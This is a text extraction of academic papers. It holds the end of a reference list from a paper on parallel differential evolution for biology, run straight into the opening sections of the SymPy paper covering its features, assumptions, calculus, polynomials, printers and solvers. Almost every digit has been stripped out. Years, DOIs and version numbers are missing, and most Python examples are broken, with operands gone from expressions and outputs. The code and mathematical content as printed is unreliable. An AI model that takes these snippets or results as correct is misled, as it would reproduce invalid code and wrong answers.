drafts of the paper. 
data availability the following information was supplied regarding data availability: sourceforge: http://deepmethod.sourceforge.net/ opensuse: https://build.opensuse.org/project/repositories/home:mackoel:compbio. references akam m. . the molecular basis for metameric pattern in the drosophila embryo. development : – . chen l, liu h-l, zheng z, xie s. . a evolutionary algorithm based on covariance matrix learning and searching preference for solving cec benchmark prob- lems. in: cec special session and competition on single objective real-parameter numerical optimization, vol. . piscataway: ieee, – . chu kw, deng y, reinitz j. . parallel simulated annealing by mixing of states. the journal of computational physics : – doi . /jcph. . . cicin-sain d, pulido ah, crombach a, wotton kr, jiménez-guri e, taly j-f, roma g, jaeger j. . superfly: a comparative database for quantified spatio- temporal gene expression patterns in early dipteran embryos. nucleic acids research (d ):d –d doi . /nar/gku . egea ja, henriques d, cokelaer t, villaverde af, macnamara a, danciu d-p, banga jr, saez-rodriguez j. . meigo: an open-source software suite based on metaheuristics for global optimization in systems biology and bioinformatics. bmc bioinformatics ( ): – doi . / - - - . egea ja, martí r, banga jr. . an evolutionary method for complex-process optimization. computers & operations research ( ): – doi . /j.cor. . . . elsayed sm, sarker ra, essam dl, hamza nm. . testing united multi-operator evolutionary algorithms on the cec- real-parameter numerical optimization. in: cec special session and competition on single objective real-parameter numerical optimization, vol. . piscataway: ieee, – . fan h-y, lampinen j. . a trigonometric mutation operation to differential evolu- tion. journal of global optimization : – doi . /a: . fomekong-nanfack y. . genetic regulatory networks inference: modeling, parameters estimation and model validation. phd thesis, university of amsterdam. fomekong-nanfack y, kaandorp j, blom j. . efficient parameter estimation for spatio-temporal models of pattern formation: case study of drosophila melanogaster. bioinformatics ( ): – doi . /bioinformatics/btm . kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://deepmethod.sourceforge.net/ https://build.opensuse.org/project/repositories/home:mackoel:compbio http://dx.doi.org/ . /jcph. . http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . / - - - http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /a: http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . /peerj-cs. gaemperle r, mueller sd, koumoutsakos p. . a parameter study for differential evolution. in: grmela a, mastorakis ne, eds. advances in intelligent systems, fuzzy systems, evolutionary computation. wseas press, – . he x, samee mah, blatti c, sinha s. . thermodynamics-based models of tran- scriptional regulation by enhancers: the roles of synergistic activation, cooperative binding and short-range repression. plos computational biology ( ):e doi . /journal.pcbi. . ivanisenko n, mishchenko e, akberdin i, demenkov p, likhoshvai v, kozlov k, todorov d, samsonova m, samsonov a, kolchanov n, ivanisenko v. . replication of the subgenomic hepatitis c virus replicon in the presence of the ns protease inhibitors: a stochastic model. biophysics ( ): – doi . /s . ivanisenko nv, mishchenko el, akberdin ir, demenkov ps, likhoshvai va, kozlov kn, todorov di, gursky vv, samsonova mg, samsonov am, clausznitzer d, kaderali l, kolchanov na, ivanisenko va. . 
a new stochastic model for subgenomic hepatitis c virus replication considers drug resistant mutants. plos one ( ):e doi . /journal.pone. . jaeger j. . the gap gene network. cellular and molecular life sciences : – doi . /s - - -y. jaeger j, surkova s, blagov m, janssens h, kosman d, kozlov kn, manu, myasnikova e, vanario-alonso ce, samsonova m, sharp dh, reinitz j. . dynamic control of positional information in the early drosophila embryo. nature : – doi . /nature . kozlov k, chebotarev d, hassan m, triska m, triska p, flegontov p, tatarinova t. a. differential evolution approach to detect recent admixture. bmc genomics (suppl ):article s doi . / . kozlov k, gursky vv, kulakovskiy iv, dymova a, samsonova m. b. analysis of functional importance of binding sites in the drosophila gap gene network model. bmc genomics ( ): – doi . / - - -s -s . kozlov k, gursky v, kulakovskiy i, samsonova m. . sequence-based model of gap gene regulatory network. bmc genomics (suppl ):article s . kozlov k, ivanisenko n, ivanisenko v, kolchanov n, samsonova m, samsonov am. . enhanced differential evolution entirely parallel method for biomedical applications. in: malyshkin v, ed. lecture notes in computer science, vol. . new york: springer, – . kozlov k, samsonov a. . deep—differential evolution entirely parallel method for gene regulatory networks. journal of supercomputing : – doi . /s - - - . kozlov k, surkova s, myasnikova e, reinitz j, samsonova m. . modeling of gap gene expression in drosophila kruppel mutants. plos computational biology ( ):e doi . /journal.pcbi. . liang jj, qu by, suganthan pn. . problem definitions and evaluation criteria for the cec special session and competition on single objective real-parameter kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /s http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /nature http://dx.doi.org/ . / http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /peerj-cs. numerical optimization. technical report . singapore: computational intelligence laboratory, zhengzhou university, zhengzhou china and technical report, nanyang technological university. lin c, lin k, luong yp, rao bg, wei yy, brennan dl, fulghum jr, hsiao hm, ma s, maxwell jp, cottrell km, perni rb, gates ca, kwong ad. . in vitro resistance studies of hepatitis c virus serine protease inhibitors, vx- and biln : structural analysis indicates different resistance mechanisms. journal of biological chemistry ( ): – doi . /jbc.m . lin k, perni rb, kwong ad, lin c. . vx- , a novel hepatitis c virus (hcv) ns - a protease inhibitor, exhibits potent antiviral activities in hcv replicon cells. an- timicrobial agents and chemotherapy ( ): – doi . /aac. . . - . . malcolm ba, liu r, lahser f, agrawal s, belanger b, butkiewicz n, chase r, gheyas f, hart a, hesk d, ingravallo p, jiang c, kong r, lu j, pichardo j, prongay a, skelton a, tong x, venkatraman s, xia e, girijavallabhan v, njoroge fg. . sch , a mechanism-based inhibitor of hepatitis c virus ns protease, suppresses polyprotein maturation and enhances the antiviral activity of alpha in- terferon in replicon cells. antimicrobial agents and chemotherapy ( ): – doi . /aac. . . - . . mendes p, kell db. . non-linear optimization of biochemical pathways: applica- tions to metabolic engineering and parameter estimation. bioinformatics : – doi . /bioinformatics/ . . . 
moles cg, mendes p, banga jr. . parameter estimation in biochemical pathways: comparison of global optimization methods. genome research : – doi . /gr. . nuriddinov m, kazantsev f, rozanov a, kozlov k, peltek s, akberdin i, kolchanov n. . mathematical modeling of ethanol and lactic acid biosynthesis by theromphilic geobacillus bacteria. russian journal of genetics: applied research ( / ): – . pisarev a, poustelnikova e, samsonova m, reinitz j. . flyex, the quantitative atlas on segmentation gene expression at cellular resolution. nucleic acids research :d –d doi . /nar/gkn . reinitz j, sharp dh. . mechanism of eve stripe formation. mechanisms of develop- ment : – doi . / - ( ) -j. samee mah, sinha s. . evaluating thermodynamic models of enhancer activity on cellular resolution gene expression data. methods : – doi . /j.ymeth. . . . seiwert sd, andrews sw, jiang y, serebryany v, tan h, kossen k, rajagopalan rpt, misialek s, stevens sk, stoycheva a, hong j, lim sr, qin x, rieger r, condroski kr, zhang h, do mg, lemieux c, hingorani gp, hartley dp, josey ja, pan l, beigelman l, blatt lm. . preclinical characteristics of the hcv ns / a protease inhibitor itmn- (r ). antimicrobial agents and chemotherapy ( ): – doi . /aac. - . kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jbc.m http://dx.doi.org/ . /aac. . . - . http://dx.doi.org/ . /aac. . . - . http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . /gr. http://dx.doi.org/ . /nar/gkn http://dx.doi.org/ . / - ( ) -j http://dx.doi.org/ . /j.ymeth. . . http://dx.doi.org/ . /aac. - http://dx.doi.org/ . /peerj-cs. spirov av, kazansky ab. . jumping genes-mutators can raise efficacy of evolu- tionary search. in: proceedings of the genetic and evolutionary computation conference gecco . san francisco: morgan kaufmann publishers inc. storn r, price k. . differential evolution—a simple and efficient heuristic for global optimization over continuous spaces. technical report tr- - . berkeley: icsi. suleimenov y. . global parameter estimation for thermodynamic models of transcriptional regulation. methods : – doi . /j.ymeth. . . . surkova s, kosman d, kozlov k, manu, myasnikova e, samsonova a, spirov a, vanario-alonso ce, samsonova m, reinitz j. . characterization of the drosophila segment determination morphome. developmental biology ( ): – doi . /j.ydbio. . . . tanabe r, fukunaga as. . improving the search performance of shade by using linear population size reduction. in: cec special session and competition on single objective real-parameter numerical optimization, vol. . piscataway: ieee, – . tasoulis d, pavlidis n, plagianakos v, vrahatis m. . parallel differential evolution. in: congress on evolutionary computation (cec ), vol. . piscataway: ieee, – . zaharie d. . parameter adaptation in differential evolution by controlling the population diversity. in: petcu d, ed. proceedigs of the th international workshop on symbolic and numeric algorithms for scientific computing. timisoara, romania, – . kozlov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.ymeth. . . http://dx.doi.org/ . /j.ydbio. . . http://dx.doi.org/ . /peerj-cs. submitted june accepted november published january corresponding author aaron meurer, asmeurer@gmail.com academic editor nick higham additional information and declarations can be found on page doi . /peerj-cs. copyright meurer et al. distributed under creative commons cc-by . 
open access sympy: symbolic computing in python aaron meurer , christopher p. smith , mateusz paprocki , ondřej Čertík , sergey b. kirpichev , matthew rocklin , amit kumar , sergiu ivanov , jason k. moore , sartaj singh , thilina rathnayake , sean vig , brian e. granger , richard p. muller , francesco bonazzi , harsh gupta , shivam vats , fredrik johansson , fabian pedregosa , matthew j. curry , , , andy r. terrel , , Štěpán roučka , ashutosh saboo , isuru fernando , sumith kulal , robert cimrman and anthony scopatz department of mechanical engineering, university of south carolina, columbia, sc, united states polar semiconductor, inc., bloomington, mn, united states continuum analytics, inc., austin, tx, united states los alamos national laboratory, los alamos, nm, united states faculty of physics, moscow state university, moscow, russia department of applied mathematics, delhi technological university, new delhi, india université paris est créteil, créteil, france mechanical and aerospace engineering, university of california, davis, ca, united states mathematical sciences, indian institute of technology (bhu), varanasi, uttar pradesh, india department of computer science and engineering, university of moratuwa, katubedda, moratuwa, sri lanka university of illinois at urbana-champaign, urbana, il, united states california polytechnic state university, san luis obispo, ca, united states center for computing research, sandia national laboratories, albuquerque, nm, united states department of theory and bio-systems, max planck institute of colloids and interfaces, potsdam, germany indian institute of technology kharagpur, kharagpur, west bengal, india inria bordeaux-sud-ouest—lfant project-team, talence, france inria—sierra project-team, paris, france department of physics and astronomy, university of new mexico, albuquerque, nm, united states center for quantum information and control, university of new mexico, albuquerque, nm, united states sandia national laboratories, albuquerque, nm, united states fashion metric, inc, austin, tx, united states numfocus, austin, tx, united states department of surface and plasma science, faculty of mathematics and physics, charles university in prague, praha, czech republic department of computer science, department of mathematics, birla institute of technology and science, goa, india indian institute of technology bombay, mumbai, maharashtra, india new technologies—research centre, university of west bohemia, plzeň, czech republic abstract sympy is an open source computer algebra system written in pure python. it is built with a focus on extensibility and ease of use, through both interactive and programmatic applications. these characteristics have led sympy to become a popular symbolic library for the scientific python ecosystem. this paper presents the architecture of sympy, a description of its features, and a discussion of select submodules. the supplementary material provide additional examples and further outline details of the architecture and features of sympy. subjects scientific computing and simulation, software engineering keywords python, computer algebra system, symbolics how to cite this article meurer et al. ( ), sympy: symbolic computing in python. peerj comput. sci. :e ; doi . /peerj- cs. https://peerj.com mailto:asmeurer@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . 
/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. this paper assumes a moderate familiarity with the python programming language. introduction sympy is a full featured computer algebra system (cas) written in the python (lutz, ) programming language. it is free and open source software, licensed under the -clause bsd license (rosen, ). the sympy project was started by ondřej Čertík in , and it has since grown to over contributors. currently, sympy is developed on github using a bazaar community model (raymond, ). the accessibility of the codebase and the open community model allow sympy to rapidly respond to the needs of users and developers. python is a dynamically typed programming language that has a focus on ease of use and readability. due in part to this focus, it has become a popular language for scientific computing and data science, with a broad ecosystem of libraries (oliphant, ). sympy is itself used as a dependency by many libraries and tools to support research within a variety of domains, such as sagemath (the sage developers, ) (pure and applied mathematics), yt (turk et al., ) (astronomy and astrophysics), pydy (gede et al., ) (multibody dynamics), and sfepy (cimrman, ) (finite elements). unlike many cas’s, sympy does not invent its own programming language. python itself is used both for the internal implementation and end user interaction. by using the operator overloading functionality of python, sympy follows the embedded domain specific language paradigm proposed by hudak ( ). the exclusive usage of a single programming language makes it easier for people already familiar with that language to use or develop sympy. simultaneously, it enables developers to focus on mathematics, rather than language design. sympy version . officially supports python . , . and . – . . sympy is designed with a strong focus on usability as a library. extensibility is important in its application program interface (api) design. thus, sympy makes no attempt to extend the python language itself. the goal is for users of sympy to be able to include sympy alongside other python libraries in their workflow, whether that be in an interactive environment or as a programmatic part in a larger system. being a library, sympy does not have a built-in graphical user interface (gui). however, sympy exposes a rich interactive display system, and supports registering display formatters with jupyter (kluyver et al., ) frontends, including the notebook and qt console, which will render sympy expressions using mathjax (cervone, ) or . the remainder of this paper discusses key components of the sympy library. section ‘overview of capabilities’ enumerates the features of sympy and takes a closer look at some of the important ones. the section ‘numerics’ looks at the numerical features of sympy and its dependency library, mpmath. section ‘physics submodule’ looks at the domain specific physics submodules for performing symbolic and numerical calculations in classical mechanics and quantum mechanics. section ‘architecture’ discusses the architecture of sympy. section ‘projects that depend on sympy’ looks at a selection of packages that depend on sympy. conclusions and future directions for sympy are given in ‘conclusion and future work’. all examples in this paper use sympy version . and mpmath version . . additionally, the supplemental information takes a deeper look at a few sympy topics. section s discusses the gruntz algorithm, which sympy uses to calculate symbolic limits. meurer et al. 
( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. import * has been used here to aid the readability of the paper, but is best to avoid such wildcard import statements in production code, as they make it unclear which names are present in the namespace. furthermore, imported names could clash with already existing imports from another package. for example, sympy, the standard python math library, and numpy all define the exp function, but only the sympy one will work with sympy symbolic expressions. the three greater-than signs denote the user input for the python interactive session, with the result, if there is one, shown on the next line. sections s –s of the supplement discuss the series, logic, diophantine equations, sets, statistics, category theory, tensor, and numerical simplification submodules of sympy, respectively. section s provides additional examples for topics discussed in the main paper. section s discusses the sympy gamma project. finally, section s of the supplement contains a brief comparison of sympy with wolfram mathematica. the following statement imports all sympy functions into the global python namespace. from here on, all examples in this paper assume that this statement has been executed : >>> from sympy import * all the examples in this paper can be tested on sympy live, an online python shell that uses the google app engine (ciurana, ) to execute sympy code. sympy live is also integrated into the sympy documentation at http://docs.sympy.org. overview of capabilities this section gives a basic introduction of sympy, and lists its features. a few features— assumptions, simplification, calculus, polynomials, printers, solvers, and matrices—are core components of sympy and are discussed in depth. many other features are discussed in depth in the supplemental information . basic usage symbolic variables, called symbols, must be defined and assigned to python variables before they can be used. this is typically done through the symbols function, which may create multiple symbols in a single function call. for instance, >>> x, y, z = symbols('x y z') creates three symbols representing variables named x, y, and z. in this particular instance, these symbols are all assigned to python variables of the same name. however, the user is free to assign them to different python variables, while representing the same symbol, such as a, b, c = symbols('x y z'). in order to minimize potential confusion, though, all examples in this paper will assume that the symbols x , y , and z have been assigned to python variables identical to their symbolic names. expressions are created from symbols using python’s mathematical syntax. for instance, the following python code creates the expression (x − x+ )/y. note that the expression remains unevaluated: it is represented symbolically. >>> (x** - *x + )/y (x** - *x + )/y list of features although sympy’s extensive feature set cannot be covered in depth in this paper, bedrock areas, that is, those areas that are used throughout the library, are discussed in their own subsections below. additionally, table gives a compact listing of all major capabilities present in the sympy codebase. this grants a sampling from the breadth of topics and application domains that sympy services. unless stated otherwise, all features noted in table are symbolic in nature. numeric features are discussed in section ‘numerics.’ meurer et al. 
( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://live.sympy.org http://docs.sympy.org http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table sympy features and descriptions. feature (submodules) description calculus (sympy.core, sympy.calculus, sympy.integrals, sympy.series) algorithms for computing derivatives, integrals, and limits. category theory (sympy.categories) representation of objects, morphisms, and diagrams. tools for drawing diagrams with xy-pic (rose, ). code generation (sympy.printing, sympy.codegen) generation of compilable and executable code in a variety of different programming languages from expressions directly. target languages include c, fortran, julia, javascript, mathematica, matlab and octave, python, and theano. combinatorics & group theory (sympy.combinatorics) permutations, combinations, partitions, subsets, various permutation groups (such as polyhedral, rubik, symmetric, and others), gray codes (nijenhuis & wilf, ), and prufer sequences (biggs, lloyd & wilson, ). concrete math (sympy.concrete) summation, products, tools for determining whether summation and product expressions are convergent, absolutely convergent, hypergeometric, and for determining other properties; computation of gosper’s normal form (petkovšek, wilf & zeilberger, ) for two univariate polynomials. cryptography (sympy.crypto) block and stream ciphers, including shift, affine, substitution, vigenère’s, hill’s, bifid, rsa, kid rsa, linear-feedback shift registers, and elgamal encryption. differential geometry (sympy.diffgeom) representations of manifolds, metrics, tensor products, and coordinate systems in riemannian and pseudo-riemannian geometries (sussman & wisdom, ). geometry (sympy.geometry) representations of d geometrical entities, such as lines and circles. enables queries on these entities, such as asking the area of an ellipse, checking for collinearity of a set of points, or finding the intersection between objects. lie algebras (sympy.liealgebras) representations of lie algebras and root systems. logic (sympy.logic) boolean expressions, equivalence testing, satisfiability, and normal forms. matrices (sympy.matrices) tools for creating matrices of symbols and expressions. both sparse and dense representations, as well as symbolic linear algebraic operations (e.g., inversion and factorization), are supported. matrix expressions (sympy.matrices.expressions) matrices with symbolic dimensions (unspecified entries). block matrices. number theory (sympy.ntheory) prime number generation, primality testing, integer factorization, continued fractions, egyptian fractions, modular arithmetic, quadratic residues, partitions, binomial and multinomial coefficients, prime number tools, hexidecimal digits of π, and integer factorization. plotting (sympy.plotting) hooks for visualizing expressions via matplotlib (hunter, ) or as text drawings when lacking a graphical back- end. d function plotting, d function plotting, and d implicit function plotting are supported. (continued on next page) meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) feature (submodules) description polynomials (sympy.polys) polynomial algebras over various coefficient domains. 
functionality ranges from simple operations (e.g., polynomial division) to advanced computations (e.g., gröbner bases (adams & loustaunau, ) and multivariate factorization over algebraic number domains). printing (sympy.printing) functions for printing sympy expressions in the terminal with ascii or unicode characters and converting sympy expressions to and mathml. quantum mechanics (sympy.physics.quantum) quantum states, bra–ket notation, operators, basis sets, representations, tensor products, inner products, outer products, commutators, anticommutators, and specific quantum system implementations. series (sympy.series) series expansion, sequences, and limits of sequences. this includes taylor, laurent, and puiseux series as well as special series, such as fourier and formal power series. sets (sympy.sets) representations of empty, finite, and infinite sets (including special sets such as the natural, integer, and complex numbers). operations on sets such as union, intersection, cartesian product, and building sets from other sets are supported. simplification (sympy.simplify) functions for manipulating and simplifying expressions. includes algorithms for simplifying hypergeometric functions, trigonometric expressions, rational functions, combinatorial functions, square root denesting, and common subexpression elimination. solvers (sympy.solvers) functions for symbolically solving equations, systems of equations, both linear and non-linear, inequalities, ordinary differential equations, partial differential equations, diophantine equations, and recurrence relations. special functions (sympy.functions) implementations of a number of well known special functions, including dirac delta, gamma, beta, gauss error functions, fresnel integrals, exponential integrals, logarithmic integrals, trigonometric integrals, bessel, hankel, airy, b-spline, riemann zeta, dirichlet eta, polylogarithm, lerch transcendent, hypergeometric, elliptic integrals, mathieu, jacobi polynomials, gegenbauer polynomial, chebyshev polynomial, legendre polynomial, hermite polynomial, laguerre polynomial, and spherical harmonic functions. statistics (sympy.stats) support for a random variable type as well as the ability to declare this variable from prebuilt distribution functions such as normal, exponential, coin, die, and other custom distributions (rocklin & terrel, ). tensors (sympy.tensor) symbolic manipulation of indexed objects. vectors (sympy.vector) basic operations on vectors and differential calculus with respect to d cartesian coordinate systems. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in sympy, √ z is defined on the usual principal branch with the branch cut along the negative real axis. sympy assumes that two expressions a and b commute with each other multiplicatively, that is, a·b=b·a, unless they both have commutative=false. many algorithms in sympy require special consideration to work correctly with noncommutative products. for historical reasons, this algorithm is distinct from the sympy.logic submodule, which is discussed in section s . sympy also has an experimental assumptions system which stores facts separate from objects, and uses sympy.logic and a sat solver for deduction. we will not discuss this system here. assumptions the assumptions system allows users to specify that symbols have certain common mathematical properties, such as being positive, imaginary, or integer. 
sympy is careful to never perform simplifications on an expression unless the assumptions allow them. for instance, the simplification √ t = t holds if t is nonnegative (t ≥ ), but it does not hold for a general complex t. by default, sympy performs all calculations assuming that symbols are complex valued. this assumption makes it easier to treat mathematical problems in full generality. >>> t = symbol('t') >>> sqrt(t** ) sqrt(t** ) by assuming the most general case, that t is complex by default, sympy avoids performing mathematically invalid operations. however, in many cases users will wish to simplify expressions containing terms like √ t . assumptions are set on symbol objects when they are created. for instance symbol('t', positive=true) will create a symbol named t that is assumed to be positive. >>> t = symbol('t', positive=true) >>> sqrt(t** ) t some of the common assumptions are negative, real, nonpositive, integer, prime and commutative. assumptions on any sympy object can be checked with the is_ assumption attributes, like t.is_positive . assumptions are only needed to restrict a domain so that certain simplifications can be performed. they are not required to make the domain match the input of a function. for instance, one can create the object ∑m n= f (n) as sum(f(n), (n, , m)) without setting integer=true when creating the symbol object n. the assumptions system additionally has deductive capabilities. the assumptions use a three-valued logic using the python built in objects true, false, and none. note that false is returned if the sympy object doesn’t or can’t have the assumption. for example, both i.is_real and i.is_prime return false for the imaginary unit i. none represents the ‘‘unknown’’ case. this could mean that given assumptions do not unambiguously specify the truth of an attribute. for instance, symbol('x', real=true).is_positive will give none because a real symbol might be positive or negative. none could also mean that not enough is known or implemented to compute the given fact. for instance, (pi + e).is_irrational gives none—indeed, the rationality of π+e is an open problem in mathematics (lang, ). basic implications between the facts are used to deduce assumptions. deductions are made using the rete algorithm (doorenbos, ). for instance, the assumptions system knows that being an integer implies being rational. >>> i = symbol('i', integer=true) >>> i.is_rational true meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- https://peerj.com http://dx.doi.org/ . /peerj-cs. the measure parameter of the simplify function lets the user specify the python function used to determine how complex an expression is. the default measure function returns the total number of operations in the expression. table some sympy simplification functions. expand expand the expression factor factor a polynomial into irreducibles collect collect polynomial coefficients cancel rewrite a rational function as p/q with common factors canceled apart compute the partial fraction decomposition of a rational function trigsimp simplify trigonometric expressions (fu, zhong & zeng, ) hyperexpand expand hypergeometric functions (roach, ; roach, ) furthermore, expressions compute the assumptions on themselves based on the assump- tions of their arguments. for instance, if x and y are both created with positive=true, then (x + y).is_positive will be true (whereas (x - y).is_positive will be none). 
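assumptions set on individual symbols propagate to the expressions built from them in exactly this way. a minimal sketch (the symbols a and b are introduced here purely for illustration; they are not part of the paper's running examples):

>>> a, b = symbols('a b', positive=True)
>>> (a + b).is_positive
True
>>> print((a - b).is_positive)  # None: the sign of a - b cannot be deduced
None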
simplification the generic way to simplify an expression is by calling the simplify function. it must be emphasized that simplification is not a rigorously defined mathematical operation (moses, ). the simplify function applies several simplification routines along with heuristics to make the output expression ‘‘simple’’. it is often preferable to apply more directed simplification functions. these apply very specific rules to the input expression and are typically able to make guarantees about the output. for instance, the factor function, given a polynomial with rational coefficients in several variables, is guaranteed to produce a factorization into irreducible factors. table lists common simplification functions. examples for these simplification functions can be found in section s . calculus sympy provides all the basic operations of calculus, such as calculating limits, derivatives, integrals, or summations. limits are computed with the limit function, using the gruntz algorithm (gruntz, ) for computing symbolic limits and heuristics (a description of the gruntz algorithm may be found in section s ). for example, the following computes limx→∞ xsin( x )= . note that sympy denotes ∞ as oo (two lower case ‘‘o’’s). >>> limit(x*sin( /x), x, oo) as a more complex example, sympy computes lim x→ ( e −cos(x) sin(x) − ) sinh(x) atan (x) =e. >>> limit(( *exp(( -cos(x))/sin(x))- )**(sinh(x)/atan(x)** ), x, ) e derivatives are computed with the diff function, which recursively uses the various differentiation rules. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. >>> diff(sin(x)*exp(x), x) exp(x)*sin(x) + exp(x)*cos(x) integrals are calculated with the integrate function. sympy implements a combination of the risch algorithm (bronstein, b), table lookups, a reimplementation of manuel bronstein’s ‘‘poor man’s integrator’’ (bronstein, a), and an algorithm for computing integrals based on meijer g-functions (roach, ; roach, ). these allow sympy to compute a wide variety of indefinite and definite integrals. the meijer g-function algorithm and the risch algorithm are respectively demonstrated below by the computation of∫ ∞ e−st log(t) dt =− log(s)+γ s and ∫ − x (log(x)+ )ex +(ex + ) x ( ex + ) ( log(x)+ ) dx = log(log(x)+ )+ ex + . >>> s, t = symbols('s t', positive=true) >>> integrate(exp(-s*t)*log(t), (t, , oo)).simplify() -(log(s) + eulergamma)/s >>> integrate((- *x** *(log(x) + )*exp(x** ) + ... (exp(x** ) + )** )/(x*(exp(x** ) + )** *(log(x) + )), x) log(log(x) + ) + /(exp(x** ) + ) summations are computed with the summation function, which uses a combination of gosper’s algorithm (gosper, ), an algorithm that uses meijer g-functions (roach, ; roach, ), and heuristics. products are computed with product function via a suite of heuristics. >>> i, n = symbols('i n') >>> summation( **i, (i, , n - )) **n - >>> summation(i*factorial(i), (i, , n)) n*factorial(n) + factorial(n) - series expansions are computed with the series function. this example computes the power series of sin(x) around x = up to x . >>> series(sin(x), x, , ) x - x** / + x** / + o(x** ) section s discusses series expansions methods in more depth. integrals, derivatives, summations, products, and limits that cannot be computed return unevaluated objects. these can also be created directly if the user chooses. 
>>> integrate(x**x, x) integral(x**x, x) >>> sum( **i, (i, , n - )) sum( **i, (i, , n - )) meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. in a dense representation, the coefficients for all terms up to the degree of each variable are stored in memory. in a sparse representation, only the nonzero coefficients are stored. many python libraries distinguish the str form of an object, which is meant to be human-readable, and the repr form, which is mean to be valid python that recreates the object. in sympy, str(expr) == repr(expr). in other words, the string representation of an expression is designed to be compact, human-readable, and valid python code that could be used to recreate the expression. as noted in section ‘the core’, the srepr function prints the exact, verbose form of an expression. polynomials sympy implements a suite of algorithms for polynomial manipulation, which ranges from relatively simple algorithms for doing arithmetic of polynomials, to advanced methods for factoring multivariate polynomials into irreducibles, symbolically determining real and complex root isolation intervals, or computing gröbner bases. polynomial manipulation is useful in its own right. within sympy, though, it is mostly used indirectly as a tool in other areas of the library. in fact, many mathematical problems in symbolic computing are first expressed using entities from the symbolic core, preprocessed, and then transformed into a problem in the polynomial algebra, where generic and efficient algorithms are used to solve the problem. the solutions to the original problem are subsequently recovered from the results. this is a common scheme in symbolic integration or summation algorithms. sympy implements dense and sparse polynomial representations. both are used in the univariate and multivariate cases. the dense representation is the default for univariate polynomials. for multivariate polynomials, the choice of representation is based on the application. the most common case for the sparse representation is algorithms for computing gröbner bases (buchberger, f , and f ) (buchberger, ; faugère, ; faugère, ). this is because different monomial orderings can be expressed easily in this representation. however, algorithms for computing multivariate gcds or factorizations, at least those currently implemented in sympy (paprocki, ), are better expressed when the representation is dense. the dense multivariate representation is specifically a recursively-dense representation, where polynomials in k[x ,x ,...,xn] are viewed as a polynomials in k[x ][x ]...[xn]. note that despite this, the coefficient domain k , can be a multivariate polynomial domain as well. the dense recursive representation in python gets inefficient as the number of variables increases. some examples for the sympy.polys submodule can be found in section s . printers sympy has a rich collection of expression printers. by default, an interactive python session will render the str form of an expression, which has been used in all the examples in this paper so far. the str form of an expression is valid python and roughly matches what a user would type to enter the expression. >>> phi = symbol('phi ') >>> str(integral(sqrt(phi ), phi )) 'integral(sqrt(phi ), phi )' a two-dimensional ( d) textual representation of the expression can be printed with monospace fonts via pprint. 
unicode characters are used for rendering mathematical symbols such as integral signs, square roots, and parentheses. greek letters and subscripts in symbol names that have unicode code points associated are also rendered automatically. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. see section s for an in depth discussion on the diophantine submodule. alternately, the use_unicode=false flag can be set, which causes the expression to be printed using only ascii characters. >>> pprint(integral(sqrt(phi + ), phi ), use_unicode=false) / | | __________ | \/ phi + d(phi ) | / the function latex returns a representation of an expression. >>> print(latex(integral(sqrt(phi + ), phi ))) \int \sqrt{\phi_{ } + }\, d\phi_{ } users are encouraged to run the init_printing function at the beginning of interactive sessions, which automatically enables the best pretty printing supported by their environment. in the jupyter notebook or qt console (pérez & granger, ), the printer is used to render expressions using mathjax or , if it is installed on the system. the d text representation is used otherwise. other printers such as mathml are also available. sympy uses an extensible printer subsystem, which allows extending any given printer, and also allows custom objects to define their printing behavior for any printer. the code generation functionality of sympy relies on this subsystem to convert expressions into code in various target programming languages. solvers sympy has equation solvers that can handle ordinary differential equations, recurrence relationships, diophantine equations, and algebraic equations. there is also rudimentary support for simple partial differential equations. there are two functions for solving algebraic equations in sympy: solve and solveset. solveset has several design changes with respect to the older solve function. this distinction is present in order to resolve the usability issues with the previous solve function api while maintaining backward compatibility with earlier versions of sympy. solveset only requires essential input information from the user. the function signatures of solve and solveset are solve(f, *symbols, **flags) solveset(f, symbol, domain=s.complexes) the domain parameter can be any set from the sympy.sets module (see section s for details on sympy.sets), but is typically either s.complexes (the default) or s.reals; the latter causes solveset to only return real solutions. an important difference between the two functions is that the output api of solve varies with input (sometimes returning a python list and sometimes a python dictionary) whereas solveset always returns a sympy set object. meurer et al. ( ), peerj comput. sci., doi . 